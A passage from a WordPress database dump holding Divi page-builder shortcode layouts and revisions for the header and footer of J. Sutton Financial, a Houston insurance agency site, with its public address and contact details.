global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','J. Sutton - Header','','inherit','closed','closed','','516-revision-v1','','','2023-03-26 19:52:48','2023-03-26 19:52:48','',516,'http://cmdev-site1.com/?p=518',0,'revision','',0),(522,1,'2023-03-26 19:56:40','2023-03-26 19:56:40','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Footer - Sub','','publish','closed','closed','','footer-sub','','','2023-03-26 19:56:40','2023-03-26 19:56:40','',0,'http://cmdev-site1.com/et_pb_layout/footer-sub/',0,'et_pb_layout','',0),(523,1,'2023-03-26 19:58:07','2023-03-26 19:58:07','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\" module_alignment_last_edited=\"on|phone\" sticky_enabled=\"0\" module_alignment_phone=\"center\" width_last_edited=\"on|phone\" width_phone=\"75%\" width_tablet=\"46.1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#FFFFFF|dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','publish','open','closed','','theme-builder-layout-2','','','2023-04-08 21:29:25','2023-04-08 21:29:25','',0,'http://cmdev-site1.com/et_footer_layout/theme-builder-layout-2/',0,'et_footer_layout','',0),(521,1,'2023-03-26 19:56:16','2023-03-26 19:56:16','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"1_2,1_2\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','14-revision-v1','','','2023-03-26 19:56:16','2023-03-26 19:56:16','',14,'http://cmdev-site1.com/?p=521',0,'revision','',0),(519,1,'2023-03-26 19:53:01','2023-03-26 19:53:01','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','10-revision-v1','','','2023-03-26 19:53:01','2023-03-26 19:53:01','',10,'http://cmdev-site1.com/?p=519',0,'revision','',0),(525,1,'2023-03-26 20:04:15','2023-03-26 20:04:15','','Theme Builder','','trash','closed','closed','','__trashed-3','','','2023-03-26 20:04:15','2023-03-26 20:04:15','',0,'http://cmdev-site1.com/?post_type=et_theme_builder&#038;p=525',0,'et_theme_builder','',0),(526,1,'2023-03-26 19:59:29','2023-03-26 19:59:29','','Default Website Template','','publish','closed','closed','','default-website-template','','','2023-03-26 19:59:29','2023-03-26 19:59:29','',0,'http://cmdev-site1.com/et_template/default-website-template/',0,'et_template','',0),(528,1,'2023-03-26 20:03:30','2023-03-26 20:03:30','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.4\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Page-Header-2200x500-1.jpg\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\" title_text=\"Page Header 2200x500\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" menu_icon_color=\"#FFFFFF\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" logo_width_tablet=\"75%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|tablet\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" menu_font_tablet=\"||||||||\" menu_font_phone=\"||||||||\" menu_font_last_edited=\"on|phone\" menu_text_color_tablet=\"\" menu_text_color_phone=\"\" menu_text_color_last_edited=\"on|phone\" background_layout_tablet=\"light\" background_layout_phone=\"light\" background_layout_last_edited=\"on|tablet\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"off|desktop\" menu_text_color__hover=\"#003372\" mobile_menu_text_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover=\"#003372\" custom_css_before_last_edited=\"on|phone\" theme_builder_area=\"et_header_layout\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','publish','open','closed','','theme-builder-layout-3','','','2023-04-10 13:15:21','2023-04-10 13:15:21','',0,'http://cmdev-site1.com/et_header_layout/theme-builder-layout-3/',0,'et_header_layout','',0),(527,1,'2023-03-26 20:02:29','2023-03-26 20:02:29','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" background_color=\"#666666\" sticky_enabled=\"0\" custom_padding=\"61px||0px|||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" link_font=\"||||on||||dotted\" sticky_enabled=\"0\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"0px||0px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Theme Builder Layout','','inherit','closed','closed','','523-revision-v1','','','2023-03-26 20:02:29','2023-03-26 20:02:29','',523,'http://cmdev-site1.com/?p=527',0,'revision','',0),(529,1,'2023-03-26 20:03:59','2023-03-26 20:03:59','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Theme Builder Layout','','inherit','closed','closed','','528-revision-v1','','','2023-03-26 20:03:59','2023-03-26 20:03:59','',528,'http://cmdev-site1.com/?p=529',0,'revision','',0),(542,1,'2023-03-26 20:15:00','2023-03-26 20:15:00','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-03-26 20:15:00','2023-03-26 20:15:00','',528,'http://cmdev-site1.com/?p=542',0,'revision','',0),(530,1,'2023-03-26 20:04:15','2023-03-26 20:04:15','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#000000\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial\" typing_effect=\", an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-03-26 20:04:15','2023-03-26 20:04:15','',528,'http://cmdev-site1.com/?p=530',0,'revision','',0),(541,1,'2023-03-26 20:14:01','2023-03-26 20:14:01','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"61px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. 